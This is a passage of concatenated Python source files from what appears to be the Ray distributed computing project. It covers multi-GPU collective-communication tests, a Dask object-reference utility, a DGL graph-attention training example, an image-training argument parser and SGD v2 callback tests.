@pytest.mark.parametrize("src_gpu_index", [0, 1])
def test_broadcast_different_name(
ray_start_distributed_multigpu_2_nodes_4_gpus, group_name, src_rank,
src_gpu_index):
world_size = 2
num_gpu_per_worker = 2
actors, _ = create_collective_multigpu_workers(
num_workers=world_size, group_name=group_name)
ray.get(actors[0].set_buffer.remote([10], value0=2, value1=3))
ray.get(actors[1].set_buffer.remote([10], value0=4, value1=5))
results = ray.get([
a.do_broadcast_multigpu.remote(
group_name=group_name,
src_rank=src_rank,
src_gpu_index=src_gpu_index) for a in actors
])
for i in range(world_size):
for j in range(num_gpu_per_worker):
val = (src_rank + 1) * 2 + src_gpu_index
assert (
results[i][j] == cp.ones([10], dtype=cp.float32) * val).all()
@pytest.mark.parametrize("array_size", [2, 2**5, 2**10, 2**15, 2**20])
@pytest.mark.parametrize("src_rank", [0, 1])
@pytest.mark.parametrize("src_gpu_index", [0, 1])
def test_broadcast_different_array_size(
ray_start_distributed_multigpu_2_nodes_4_gpus, array_size, src_rank,
src_gpu_index):
world_size = 2
num_gpu_per_worker = 2
actors, _ = create_collective_multigpu_workers(world_size)
ray.get(actors[0].set_buffer.remote([array_size], value0=2, value1=3))
ray.get(actors[1].set_buffer.remote([array_size], value0=4, value1=5))
results = ray.get([
a.do_broadcast_multigpu.remote(
src_rank=src_rank, src_gpu_index=src_gpu_index) for a in actors
])
for i in range(world_size):
for j in range(num_gpu_per_worker):
val = (src_rank + 1) * 2 + src_gpu_index
assert (results[i][j] == cp.ones(
(array_size, ), dtype=cp.float32) * val).all()
@pytest.mark.parametrize("src_rank", [0, 1])
@pytest.mark.parametrize("src_gpu_index", [0, 1])
def test_broadcast_torch_cupy(ray_start_distributed_multigpu_2_nodes_4_gpus,
src_rank, src_gpu_index):
import torch
world_size = 2
num_gpu_per_worker = 2
actors, _ = create_collective_multigpu_workers(world_size)
ray.get(actors[0].set_buffer.remote([10], value0=2, value1=3))
ray.get(actors[1].set_buffer.remote(
[10], value0=4, value1=5, tensor_type0="torch", tensor_type1="torch"))
results = ray.get([
a.do_broadcast_multigpu.remote(
src_rank=src_rank, src_gpu_index=src_gpu_index) for a in actors
])
for i in range(world_size):
for j in range(num_gpu_per_worker):
val = (src_rank + 1) * 2 + src_gpu_index
if i == 0:
assert (results[i][j] == cp.ones([10], dtype=cp.float32) *
val).all()
else:
assert (results[i][j] == torch.ones([10]).cuda(j) * val).all()
@pytest.mark.parametrize("src_rank", [3, 4])
@pytest.mark.parametrize("src_gpu_index", [2, 3])
def test_broadcast_invalid_rank(ray_start_distributed_multigpu_2_nodes_4_gpus,
src_rank, src_gpu_index):
world_size = 2
actors, _ = create_collective_multigpu_workers(world_size)
with pytest.raises(ValueError):
_ = ray.get([
a.do_broadcast_multigpu.remote(
src_rank=src_rank, src_gpu_index=src_gpu_index) for a in actors
])
```
#### File: tests/distributed_multigpu_tests/test_distributed_multigpu_reducescatter.py
```python
import pytest
import ray
import cupy as cp
import torch
from ray.util.collective.tests.util import \
create_collective_multigpu_workers, \
init_tensors_for_gather_scatter_multigpu
@pytest.mark.parametrize("tensor_backend", ["cupy", "torch"])
@pytest.mark.parametrize("array_size",
[2, 2**5, 2**10, 2**15, 2**20, [2, 2], [5, 5, 5]])
def test_reducescatter_different_array_size(
ray_start_distributed_multigpu_2_nodes_4_gpus, array_size,
tensor_backend):
world_size = 2
num_gpu_per_worker = 2
actual_world_size = world_size * num_gpu_per_worker
actors, _ = create_collective_multigpu_workers(world_size)
init_tensors_for_gather_scatter_multigpu(
actors, array_size=array_size, tensor_backend=tensor_backend)
results = ray.get([a.do_reducescatter_multigpu.remote() for a in actors])
for i in range(world_size):
for j in range(num_gpu_per_worker):
if tensor_backend == "cupy":
assert (results[i][j] == cp.ones(array_size, dtype=cp.float32)
* actual_world_size).all()
else:
assert (results[i][j] == torch.ones(
array_size, dtype=torch.float32).cuda(j) *
actual_world_size).all()
def test_reducescatter_torch_cupy(
ray_start_distributed_multigpu_2_nodes_4_gpus):
world_size = 2
num_gpu_per_worker = 2
actual_world_size = world_size * num_gpu_per_worker
shape = [10, 10]
actors, _ = create_collective_multigpu_workers(world_size)
# tensor is pytorch, list is cupy
for i, a in enumerate(actors):
ray.get([
a.set_buffer.remote(
shape, tensor_type0="torch", tensor_type1="torch")
])
ray.get([
a.set_list_buffer.remote(
shape, tensor_type0="cupy", tensor_type1="cupy")
])
results = ray.get([a.do_reducescatter_multigpu.remote() for a in actors])
for i in range(world_size):
for j in range(num_gpu_per_worker):
assert (results[i][j] == torch.ones(
shape, dtype=torch.float32).cuda(j) * actual_world_size).all()
# tensor is cupy, list is pytorch
for i, a in enumerate(actors):
ray.get([
a.set_buffer.remote(
shape, tensor_type0="cupy", tensor_type1="cupy")
])
ray.get([
a.set_list_buffer.remote(
shape, tensor_type0="torch", tensor_type1="torch")
])
results = ray.get([a.do_reducescatter_multigpu.remote() for a in actors])
for i in range(world_size):
for j in range(num_gpu_per_worker):
assert (results[i][j] == cp.ones(shape, dtype=cp.float32) *
actual_world_size).all()
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", "-x", __file__]))
```
#### File: util/dask/common.py
```python
from collections import OrderedDict
from collections.abc import Iterator
from operator import getitem
import uuid
import ray
from dask.base import quote
from dask.core import get as get_sync
from dask.utils import apply
try:
from dataclasses import is_dataclass, fields as dataclass_fields
except ImportError:
# Python < 3.7
def is_dataclass(x):
return False
def dataclass_fields(x):
return []
def unpack_object_refs(*args):
"""
Extract Ray object refs from a set of potentially arbitrarily nested
Python objects.
Intended use is to find all Ray object references in a set of (possibly
nested) Python objects, do something to them (get(), wait(), etc.), then
repackage them into equivalent Python objects.
Args:
*args: One or more (potentially nested) Python objects that contain
Ray object references.
Returns:
A 2-tuple of a flat list of all contained Ray object references, and a
function that, when given the corresponding flat list of concrete
values, will return a set of Python objects equivalent to that which
was given in *args, but with all Ray object references replaced with
their corresponding concrete values.
"""
object_refs = []
repack_dsk = {}
object_refs_token = uuid.uuid4().hex
def _unpack(expr):
if isinstance(expr, ray.ObjectRef):
token = expr.hex()
repack_dsk[token] = (getitem, object_refs_token, len(object_refs))
object_refs.append(expr)
return token
token = uuid.uuid4().hex
# Treat iterators like lists
typ = list if isinstance(expr, Iterator) else type(expr)
if typ in (list, tuple, set):
repack_task = (typ, [_unpack(i) for i in expr])
elif typ in (dict, OrderedDict):
repack_task = (typ,
[[_unpack(k), _unpack(v)] for k, v in expr.items()])
elif is_dataclass(expr):
repack_task = (
apply,
typ,
(),
(
dict,
[[f.name, _unpack(getattr(expr, f.name))]
for f in dataclass_fields(expr)],
),
)
else:
return expr
repack_dsk[token] = repack_task
return token
out = uuid.uuid4().hex
repack_dsk[out] = (tuple, [_unpack(i) for i in args])
def repack(results):
dsk = repack_dsk.copy()
dsk[object_refs_token] = quote(results)
return get_sync(dsk, out)
return object_refs, repack
```
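A minimal usage sketch of `unpack_object_refs`, assuming Ray and Dask are installed; the import path is inferred from the file header. Note that `repack` returns the repackaged `*args` as a tuple.
```python
import ray

# Hypothetical import path, inferred from the file header above.
from ray.util.dask.common import unpack_object_refs

ray.init()
nested = {"a": ray.put(1), "b": [ray.put(2), 3]}
refs, repack = unpack_object_refs(nested)
values = ray.get(refs)  # concrete values for every extracted ObjectRef
print(repack(values))   # ({'a': 1, 'b': [2, 3]},)
ray.shutdown()
```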
#### File: examples/deep_graph/gat_dgl.py
```python
import os
import time
import numpy as np
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import ray
from ray.util.sgd import TorchTrainer
from ray.util.sgd.utils import AverageMeterCollection
from ray.util.sgd.torch import TrainingOperator
import dgl
from dgl.data import RedditDataset
from dgl.nn.pytorch import GATConv
from torch.utils.data import DataLoader
from dgl.dataloading import NodeCollator
print("Current Path: " + os.getcwd())
torch.manual_seed(42)
# define the model class
class GAT(nn.Module):
def __init__(self, in_feats, n_hidden, n_classes, n_layers, n_heads,
activation, feat_drop, attn_drop, negative_slope, residual):
super().__init__()
self.n_layers = n_layers
self.activation = activation
self.n_hidden = n_hidden
self.n_heads = n_heads
self.n_classes = n_classes
self.convs = nn.ModuleList()
# input layer
self.convs.append(
GATConv((in_feats, in_feats), n_hidden, n_heads, feat_drop,
attn_drop, negative_slope, residual, self.activation))
# hidden layer
for _ in range(1, n_layers - 1):
            # Due to multi-head attention, in_dim = n_hidden * n_heads.
self.convs.append(
GATConv((n_hidden * n_heads, n_hidden * n_heads), n_hidden,
n_heads, feat_drop, attn_drop, negative_slope,
residual, self.activation))
# output layer
self.convs.append(
GATConv((n_hidden * n_heads, n_hidden * n_heads), n_classes,
n_heads, feat_drop, attn_drop, negative_slope, residual,
None))
def forward(self, blocks, x):
h = x
for i, (layer, block) in enumerate(zip(self.convs, blocks)):
h_dst = h[:block.number_of_dst_nodes()]
if i != len(self.convs) - 1:
h = layer(block, (h, h_dst)).flatten(1)
h = F.dropout(h, p=0.5, training=self.training)
else:
h = layer(block, (h, h_dst))
h = h.mean(1)
return h.log_softmax(dim=-1)
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (torch.argmax(pred, dim=1) == labels).float().sum() / len(pred)
class CustomTrainingOperator(TrainingOperator):
def setup(self, config):
# load reddit data
data = RedditDataset()
g = data[0]
g.ndata["features"] = g.ndata["feat"]
g.ndata["labels"] = g.ndata["label"]
self.in_feats = g.ndata["features"].shape[1]
self.n_classes = data.num_classes
        # Add self-loops.
g = dgl.remove_self_loop(g)
g = dgl.add_self_loop(g)
# Create csr/coo/csc formats before launching training processes
g.create_formats_()
self.g = g
train_nid = torch.nonzero(g.ndata["train_mask"], as_tuple=True)[0]
val_nid = torch.nonzero(g.ndata["val_mask"], as_tuple=True)[0]
test_nid = torch.nonzero(g.ndata["test_mask"], as_tuple=True)[0]
self.train_nid = train_nid
self.val_nid = val_nid
self.test_nid = test_nid
# Create sampler
sampler = dgl.dataloading.MultiLayerNeighborSampler(
[int(fanout) for fanout in config["fan_out"].split(",")])
# Create PyTorch DataLoader for constructing blocks
collator = NodeCollator(g, train_nid, sampler)
train_dataloader = DataLoader(
collator.dataset,
collate_fn=collator.collate,
batch_size=config["batch_size"],
shuffle=False,
drop_last=False,
num_workers=config["sampling_num_workers"])
        # Define the model and optimizer; residual is set to True.
model = GAT(self.in_feats, config["n_hidden"], self.n_classes,
config["n_layers"], config["n_heads"], F.elu,
config["feat_drop"], config["attn_drop"],
config["negative_slope"], True)
self.convs = model.convs
# Define optimizer.
optimizer = torch.optim.Adam(model.parameters(), lr=config["lr"])
# Register model, optimizer, and loss.
self.model, self.optimizer = self.register(
models=model, optimizers=optimizer)
# Register data loaders.
self.register_data(train_loader=train_dataloader)
def train_epoch(self, iterator, info):
meter_collection = AverageMeterCollection()
iter_tput = []
model = self.model
# for batch_idx,batch in enumerate(iterator):
for step, (input_nodes, seeds, blocks) in enumerate(iterator):
tic_step = time.time()
            # Run one training step.
optimizer = self.optimizer
device = 0
if self.use_gpu:
blocks = [block.int().to(device) for block in blocks]
batch_inputs = blocks[0].srcdata["features"]
batch_labels = blocks[-1].dstdata["labels"]
batch_pred = model(blocks, batch_inputs)
loss = F.nll_loss(batch_pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
iter_tput.append(len(seeds) / (time.time() - tic_step))
if step % 20 == 0:
acc = compute_acc(batch_pred, batch_labels)
gpu_mem_alloc = torch.cuda.max_memory_allocated(
) / 1000000 if torch.cuda.is_available() else 0
print("Epoch {:05d} | Step {:05d} | Loss {:.4f} | "
"Train Acc {:.4f} | Speed (samples/sec) {:.4f} | GPU "
"{:.1f} MB".format(info["epoch_idx"] + 1, step,
loss.item(), acc.item(),
np.mean(iter_tput[3:]),
gpu_mem_alloc))
status = meter_collection.summary()
return status
def validate(self, validation_loader, info):
meter_collection = AverageMeterCollection()
model = self.model
n_layers = self.config["n_layers"]
n_hidden = self.config["n_hidden"]
n_heads = self.config["n_heads"]
batch_size = self.config["batch_size"]
num_workers = self.config["sampling_num_workers"]
g = self.g
train_nid = self.train_nid
val_nid = self.val_nid
test_nid = self.test_nid
device = 0
model.eval()
with torch.no_grad():
x = g.ndata["features"]
for i, layer in enumerate(self.convs):
if i < n_layers - 1:
y = torch.zeros(
g.number_of_nodes(), n_hidden * n_heads
if i != len(self.convs) - 1 else self.n_classes)
else:
y = torch.zeros(
g.number_of_nodes(), n_hidden
if i != len(self.convs) - 1 else self.n_classes)
sampler = dgl.dataloading.MultiLayerFullNeighborSampler(1)
collator = NodeCollator(g, torch.arange(g.number_of_nodes()),
sampler)
dataloader = DataLoader(
collator.dataset,
collate_fn=collator.collate,
batch_size=batch_size,
shuffle=False,
drop_last=False,
num_workers=num_workers)
for input_nodes, output_nodes, blocks in dataloader:
block = blocks[0]
# print("block:",block)
block = block.int().to(device)
h = x[input_nodes].to(device)
h_dst = x[output_nodes].to(device)
if i != len(self.convs) - 1:
h = layer(block, (h, h_dst)).flatten(1)
else:
h = layer(block, (h, h_dst)).mean(1)
h = h.log_softmax(dim=-1)
y[output_nodes] = h.cpu()
x = y
pred = y
labels = g.ndata["labels"]
            # Train accuracy is computed for completeness but not reported.
            _ = compute_acc(pred[train_nid], labels[train_nid])
            val_acc = compute_acc(pred[val_nid], labels[val_nid])
            test_acc = compute_acc(pred[test_nid], labels[test_nid])
metrics = {
"num_samples": pred.size(0),
"val_acc": val_acc.item(),
"test_acc": test_acc.item()
}
meter_collection.update(metrics, n=metrics.pop("num_samples", 1))
status = meter_collection.summary()
return status
def run(num_workers, use_gpu, num_epochs, lr, batch_size, n_hidden, n_layers,
n_heads, fan_out, feat_drop, attn_drop, negative_slope,
sampling_num_workers):
trainer = TorchTrainer(
training_operator_cls=CustomTrainingOperator,
num_workers=num_workers,
use_gpu=use_gpu,
backend="nccl",
config={
"lr": lr,
"batch_size": batch_size,
"n_hidden": n_hidden,
"n_layers": n_layers,
"n_heads": n_heads,
"fan_out": fan_out,
"feat_drop": feat_drop,
"attn_drop": attn_drop,
"negative_slope": negative_slope,
"sampling_num_workers": sampling_num_workers
})
for i in range(num_epochs):
trainer.train()
validation_results = trainer.validate()
trainer.shutdown()
print(validation_results)
print("success!")
# Use ray.init(address="auto") if running on a Ray cluster.
if __name__ == "__main__":
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument("--num-workers", type=int, default=2)
argparser.add_argument("--use-gpu", type=bool, default=True)
argparser.add_argument("--num-epochs", type=int, default=2)
argparser.add_argument("--lr", type=float, default=0.001)
argparser.add_argument("--batch-size", type=int, default=1024)
argparser.add_argument("--n-hidden", type=int, default=128)
argparser.add_argument("--n-layers", type=int, default=2)
argparser.add_argument("--n-heads", type=int, default=4)
argparser.add_argument("--fan-out", type=str, default="10,25")
argparser.add_argument("--feat-drop", type=float, default=0.)
argparser.add_argument("--attn-drop", type=float, default=0.)
argparser.add_argument("--negative-slope", type=float, default=0.2)
argparser.add_argument(
"--sampling-num-workers",
type=int,
default=0,
help="Number of sampling processes. Use 0 for no extra process.")
argparser.add_argument(
"--address",
required=False,
type=str,
help="The address to use for ray")
args = argparser.parse_args()
ray.init(address=args.address)
run(num_workers=args.num_workers,
use_gpu=args.use_gpu,
num_epochs=args.num_epochs,
lr=args.lr,
batch_size=args.batch_size,
n_hidden=args.n_hidden,
n_layers=args.n_layers,
n_heads=args.n_heads,
fan_out=args.fan_out,
feat_drop=args.feat_drop,
attn_drop=args.attn_drop,
negative_slope=args.negative_slope,
sampling_num_workers=args.sampling_num_workers)
```
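For reference, the `run()` helper above can also be driven directly from Python instead of through argparse. The call below is only a sketch with illustrative values; it assumes the definitions above are importable and that every Ray worker has a CUDA-capable GPU, since the trainer hard-codes the NCCL backend.

```python
# Sketch only: illustrative values, not tuned defaults. Requires a GPU on each
# Ray worker because TorchTrainer is created with backend="nccl" above.
import ray

ray.init()  # or ray.init(address="auto") to attach to a running cluster
run(num_workers=1,
    use_gpu=True,
    num_epochs=1,
    lr=0.001,
    batch_size=1024,
    n_hidden=128,
    n_layers=2,
    n_heads=4,
    fan_out="10,25",
    feat_drop=0.0,
    attn_drop=0.0,
    negative_slope=0.2,
    sampling_num_workers=0)
```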
#### File: examples/image_models/args.py
```python
import logging
import argparse
import yaml
config_parser = parser = argparse.ArgumentParser(
description="Training Config", add_help=False)
parser.add_argument(
"-c",
"--config",
default="",
type=str,
metavar="FILE",
help="YAML config file specifying default arguments")
parser = argparse.ArgumentParser(description="PyTorch ImageNet Training")
# Dataset / Model parameters
parser.add_argument("data_dir", metavar="DIR", help="path to dataset")
parser.add_argument(
"--dataset",
"-d",
metavar="NAME",
default="",
help="dataset type (default: ImageFolder/ImageTar if empty)")
parser.add_argument(
"--train-split",
metavar="NAME",
default="train",
help="dataset train split (default: train)")
parser.add_argument(
"--val-split",
metavar="NAME",
default="validation",
help="dataset validation split (default: validation)")
parser.add_argument(
"--model",
default="resnet101",
type=str,
metavar="MODEL",
help="Name of model to train (default: 'countception'")
parser.add_argument(
"--pretrained",
action="store_true",
default=False,
help="Start with pretrained version of specified network (if avail)")
parser.add_argument(
"--initial-checkpoint",
default="",
type=str,
metavar="PATH",
help="Initialize model from this checkpoint (default: none)")
parser.add_argument(
"--resume",
default="",
type=str,
metavar="PATH",
help="Resume full model and optimizer state from checkpoint "
"(default: none)")
parser.add_argument(
"--no-resume-opt",
action="store_true",
default=False,
help="prevent resume of optimizer state when resuming model")
parser.add_argument(
"--num-classes",
type=int,
default=1000,
metavar="N",
help="number of label classes (default: 1000)")
parser.add_argument(
"--gp",
default="avg",
type=str,
metavar="POOL",
help=("Type of global pool, 'avg', 'max', 'avgmax', 'avgmaxc' "
"(default: 'avg')"))
parser.add_argument(
"--img-size",
type=int,
default=None,
metavar="N",
help="Image patch size (default: None => model default)")
parser.add_argument(
"--crop-pct",
default=None,
type=float,
metavar="N",
help="Input image center crop percent (for validation only)")
parser.add_argument(
"--mean",
type=float,
nargs="+",
default=None,
metavar="MEAN",
help="Override mean pixel value of dataset")
parser.add_argument(
"--std",
type=float,
nargs="+",
default=None,
metavar="STD",
help="Override std deviation of of dataset")
parser.add_argument(
"--interpolation",
default="",
type=str,
metavar="NAME",
help="Image resize interpolation type (overrides model)")
parser.add_argument(
"-b",
"--batch-size",
type=int,
default=32,
metavar="N",
help="input batch size for training (default: 32)")
parser.add_argument(
"-vb",
"--validation-batch-size-multiplier",
type=int,
default=1,
metavar="N",
help="ratio of validation batch size to training batch size (default: 1)")
parser.add_argument(
"--drop",
type=float,
default=0.0,
metavar="PCT",
help="Dropout rate (default: 0.)")
parser.add_argument(
"--drop-connect",
type=float,
default=None,
metavar="PCT",
help="Drop connect rate, DEPRECATED, use drop-path (default: None)")
parser.add_argument(
"--drop-path",
type=float,
default=None,
metavar="PCT",
help="Drop path rate (default: None)")
parser.add_argument(
"--drop-block",
type=float,
default=None,
metavar="PCT",
help="Drop block rate (default: None)")
parser.add_argument(
"--jsd",
action="store_true",
default=False,
help="Enable Jensen-Shannon Divergence + CE loss. Use with `--aug-splits`."
)
# Optimizer parameters
parser.add_argument(
"--opt",
default="sgd",
type=str,
metavar="OPTIMIZER",
help="Optimizer (default: 'sgd'")
parser.add_argument(
"--opt-eps",
default=1e-8,
type=float,
metavar="EPSILON",
help="Optimizer Epsilon (default: 1e-8)")
parser.add_argument(
"--momentum",
type=float,
default=0.9,
metavar="M",
help="SGD momentum (default: 0.9)")
parser.add_argument(
"--weight-decay",
type=float,
default=0.0001,
help="weight decay (default: 0.0001)")
# Learning rate schedule parameters
parser.add_argument(
"--sched",
default="step",
type=str,
metavar="SCHEDULER",
help="LR scheduler (default: 'step'")
parser.add_argument(
"--lr",
type=float,
default=0.01,
metavar="LR",
help="learning rate (default: 0.01)")
parser.add_argument(
"--lr-noise",
type=float,
nargs="+",
default=None,
metavar="pct, pct",
help="learning rate noise on/off epoch percentages")
parser.add_argument(
"--lr-noise-pct",
type=float,
default=0.67,
metavar="PERCENT",
help="learning rate noise limit percent (default: 0.67)")
parser.add_argument(
"--lr-noise-std",
type=float,
default=1.0,
metavar="STDDEV",
help="learning rate noise std-dev (default: 1.0)")
parser.add_argument(
"--warmup-lr",
type=float,
default=0.0001,
metavar="LR",
help="warmup learning rate (default: 0.0001)")
parser.add_argument(
"--min-lr",
type=float,
default=1e-5,
metavar="LR",
help="lower lr bound for cyclic schedulers that hit 0 (1e-5)")
parser.add_argument(
"--epochs",
type=int,
default=200,
metavar="N",
help="number of epochs to train (default: 2)")
parser.add_argument(
"--start-epoch",
default=None,
type=int,
metavar="N",
help="manual epoch number (useful on restarts)")
parser.add_argument(
"--decay-epochs",
type=float,
default=30,
metavar="N",
help="epoch interval to decay LR")
parser.add_argument(
"--warmup-epochs",
type=int,
default=3,
metavar="N",
help="epochs to warmup LR, if scheduler supports")
parser.add_argument(
"--cooldown-epochs",
type=int,
default=10,
metavar="N",
help="epochs to cooldown LR at min_lr, after cyclic schedule ends")
parser.add_argument(
"--patience-epochs",
type=int,
default=10,
metavar="N",
help="patience epochs for Plateau LR scheduler (default: 10")
parser.add_argument(
"--decay-rate",
"--dr",
type=float,
default=0.1,
metavar="RATE",
help="LR decay rate (default: 0.1)")
# Augmentation parameters
parser.add_argument(
"--color-jitter",
type=float,
default=0.4,
metavar="PCT",
help="Color jitter factor (default: 0.4)")
parser.add_argument(
"--aa",
type=str,
default=None,
metavar="NAME",
help="Use AutoAugment policy. 'v0' or 'original'. (default: None)"),
# parser.add_argument(
# "--aug-splits",
# type=int,
# default=0,
# help="Number of augmentation splits (default: 0, valid: 0 or >=2)")
parser.add_argument(
"--reprob",
type=float,
default=0.,
metavar="PCT",
help="Random erase prob (default: 0.)")
parser.add_argument(
"--remode",
type=str,
default="const",
help="Random erase mode (default: 'const')")
parser.add_argument(
"--recount", type=int, default=1, help="Random erase count (default: 1)")
parser.add_argument(
"--resplit",
action="store_true",
default=False,
help="Do not random erase first (clean) augmentation split")
parser.add_argument(
"--mixup",
type=float,
default=0.0,
help="mixup alpha, mixup enabled if > 0. (default: 0.)")
parser.add_argument(
"--mixup-off-epoch",
default=0,
type=int,
metavar="N",
help="turn off mixup after this epoch, disabled if 0 (default: 0)")
parser.add_argument(
"--smoothing",
type=float,
default=0.1,
help="label smoothing (default: 0.1)")
parser.add_argument(
"--train-interpolation",
type=str,
default="random",
help="Training interpolation (random, bilinear, bicubic default: 'random')"
)
# Batch norm parameters
# (only works with gen_efficientnet based models currently)
parser.add_argument(
"--bn-tf",
action="store_true",
default=False,
help="Use Tensorflow BatchNorm defaults for models that support it "
"(default: False)")
parser.add_argument(
"--bn-momentum",
type=float,
default=None,
help="BatchNorm momentum override (if not None)")
parser.add_argument(
"--bn-eps",
type=float,
default=None,
help="BatchNorm epsilon override (if not None)")
parser.add_argument(
"--sync-bn",
action="store_true",
help="Enable NVIDIA Apex or Torch synchronized BatchNorm.")
parser.add_argument(
"--dist-bn",
type=str,
default="",
help=("Distribute BatchNorm stats between nodes after each epoch "
"('broadcast', 'reduce', or '')"))
# parser.add_argument(
# "--split-bn",
# action="store_true",
# help="Enable separate BN layers per augmentation split.")
# Model Exponential Moving Average
parser.add_argument(
"--model-ema",
action="store_true",
default=False,
help="Enable tracking moving average of model weights")
parser.add_argument(
"--model-ema-force-cpu",
action="store_true",
default=False,
help="Force ema to be tracked on CPU, rank=0 node only. "
"Disables EMA validation.")
parser.add_argument(
"--model-ema-decay",
type=float,
default=0.9998,
help="decay factor for model weights moving average (default: 0.9998)")
# Misc
parser.add_argument(
"--seed",
type=int,
default=42,
metavar="S",
help="random seed (default: 42)")
parser.add_argument(
"--log-interval",
type=int,
default=50,
metavar="N",
help="how many batches to wait before logging training status")
parser.add_argument(
"--recovery-interval",
type=int,
default=0,
metavar="N",
help="how many batches to wait before writing recovery checkpoint")
parser.add_argument(
"--no-gpu",
action="store_true",
default=False,
help="do not use a GPU even if available")
parser.add_argument(
"--save-images",
action="store_true",
default=False,
help="save images of input bathes every log interval for debugging")
parser.add_argument(
"--amp",
action="store_true",
default=False,
help="use NVIDIA amp for mixed precision training")
parser.add_argument(
"--pin-mem",
action="store_true",
default=False,
help="Pin CPU memory in DataLoader for more efficient (sometimes) "
"transfer to GPU.")
parser.add_argument(
"--no-prefetcher",
action="store_true",
default=False,
help="disable fast prefetcher")
parser.add_argument(
"--output",
default="",
type=str,
metavar="PATH",
help="path to output folder (default: none, current dir)")
parser.add_argument(
"--eval-metric",
default="prec1",
type=str,
metavar="EVAL_METRIC",
help="Best metric (default: 'prec1'")
parser.add_argument(
"--tta",
type=int,
default=0,
metavar="N",
help="Test/inference time augmentation (oversampling) factor. 0=None "
"(default: 0)")
parser.add_argument("--local_rank", default=0, type=int)
# ray
parser.add_argument(
"--ray-address", metavar="ADDR", help="Ray cluster address.")
parser.add_argument(
"-n",
"--ray-num-workers",
type=int,
default=1,
metavar="N",
help="Number of Ray replicas to use. [default=1]")
parser.add_argument(
"--mock-data",
action="store_true",
default=False,
help="Use mocked data for testing. [default=False]")
parser.add_argument(
"--smoke-test",
action="store_true",
default=False,
help="Only run one step for testing. [default=False]")
def parse_args():
# Do we have a config file to parse?
args_config, remaining = config_parser.parse_known_args()
if args_config.config:
with open(args_config.config, "r") as f:
cfg = yaml.safe_load(f)
parser.set_defaults(**cfg)
# The main arg parser parses the rest of the args, the usual
# defaults will have been overridden if config file specified.
args = parser.parse_args(remaining)
# Cache the args as a text string to save them in the output dir later
args_text = yaml.safe_dump(args.__dict__, default_flow_style=False)
# Arguments pre-processing from the original train.py
args.prefetcher = not args.no_prefetcher
args.distributed = False # ray SGD handles this (DistributedSampler)
args.device = "cuda" # ray should handle this
if args.no_gpu and args.prefetcher:
logging.warning("Prefetcher needs CUDA currently "
"(might be a bug in timm). "
"Disabling it.")
args.prefetcher = False
# assert args.aug_splits == 0 or args.aug_splits > 1, (
# "Split must be 0 or 2+")
# args.num_aug_splits = args.aug_splits
args.num_aug_splits = 0 # todo:
args.split_bn = False # todo:
return args, args_text
```
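As a rough sketch of how the two-stage parsing above behaves, the snippet below writes a small YAML file, points `-c/--config` at it, and then overrides one flag on the command line. The file name and values are hypothetical; the YAML keys must match the argparse destinations (dashes become underscores).

```python
# Hypothetical usage of parse_args() defined above. The YAML supplies
# defaults; explicit command-line flags still win.
import sys
import yaml

with open("example_config.yaml", "w") as f:
    yaml.safe_dump({"model": "resnet50", "batch_size": 64, "epochs": 10}, f)

# Simulated command line: config file, one override, and the required data dir.
sys.argv = ["train.py", "-c", "example_config.yaml", "--lr", "0.05",
            "/path/to/imagenet"]
args, args_text = parse_args()
print(args.model, args.batch_size, args.lr)  # -> resnet50 64 0.05
```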
#### File: v2/tests/test_callbacks.py
```python
import pytest
import os
import shutil
import tempfile
import json
import ray
import ray.util.sgd.v2 as sgd
from ray.util.sgd.v2 import Trainer
from ray.util.sgd.v2.constants import (
TRAINING_ITERATION, DETAILED_AUTOFILLED_KEYS, BASIC_AUTOFILLED_KEYS,
ENABLE_DETAILED_AUTOFILLED_METRICS_ENV)
from ray.util.sgd.v2.callbacks import JsonLoggerCallback
from ray.util.sgd.v2.backends.backend import BackendConfig, BackendInterface
from ray.util.sgd.v2.worker_group import WorkerGroup
@pytest.fixture
def ray_start_4_cpus():
address_info = ray.init(num_cpus=4)
yield address_info
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def make_temp_dir():
tmpdir = str(tempfile.mkdtemp())
yield tmpdir
# The code after the yield will run as teardown code.
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir)
class TestConfig(BackendConfig):
@property
def backend_cls(self):
return TestBackend
class TestBackend(BackendInterface):
def on_start(self, worker_group: WorkerGroup, backend_config: TestConfig):
pass
def on_shutdown(self, worker_group: WorkerGroup,
backend_config: TestConfig):
pass
@pytest.mark.parametrize("workers_to_log", [0, None, [0, 1]])
@pytest.mark.parametrize("detailed", [False, True])
@pytest.mark.parametrize("filename", [None, "my_own_filename.json"])
def test_json(ray_start_4_cpus, make_temp_dir, workers_to_log, detailed,
filename):
if detailed:
os.environ[ENABLE_DETAILED_AUTOFILLED_METRICS_ENV] = "1"
else:
os.environ.pop(ENABLE_DETAILED_AUTOFILLED_METRICS_ENV, 0)
config = TestConfig()
num_iters = 5
num_workers = 4
if workers_to_log is None:
num_workers_to_log = num_workers
elif isinstance(workers_to_log, int):
num_workers_to_log = 1
else:
num_workers_to_log = len(workers_to_log)
def train_func():
for i in range(num_iters):
sgd.report(index=i)
return 1
if filename is None:
# if None, use default value
callback = JsonLoggerCallback(
make_temp_dir, workers_to_log=workers_to_log)
assert str(
callback.log_path.name) == JsonLoggerCallback._default_filename
else:
callback = JsonLoggerCallback(
make_temp_dir, filename=filename, workers_to_log=workers_to_log)
assert str(callback.log_path.name) == filename
trainer = Trainer(config, num_workers=num_workers)
trainer.start()
trainer.run(train_func, callbacks=[callback])
with open(callback.log_path, "r") as f:
log = json.load(f)
print(log)
assert len(log) == num_iters
assert len(log[0]) == num_workers_to_log
assert all(len(element) == len(log[0]) for element in log)
assert all(
all(worker["index"] == worker[TRAINING_ITERATION] - 1
for worker in element) for element in log)
assert all(
all(
all(key in worker for key in BASIC_AUTOFILLED_KEYS)
for worker in element) for element in log)
if detailed:
assert all(
all(
all(key in worker for key in DETAILED_AUTOFILLED_KEYS)
for worker in element) for element in log)
else:
assert all(
all(not any(key in worker for key in DETAILED_AUTOFILLED_KEYS)
for worker in element) for element in log)
```
#### File: v2/tests/test_session.py
```python
import time
import pytest
from ray.util.sgd.v2.session import init_session, shutdown_session, \
get_session, world_rank, report
@pytest.fixture(scope="function")
def session():
def f():
return 1
init_session(training_func=f, world_rank=0)
yield get_session()
shutdown_session()
def test_init_fail(session):
with pytest.raises(ValueError):
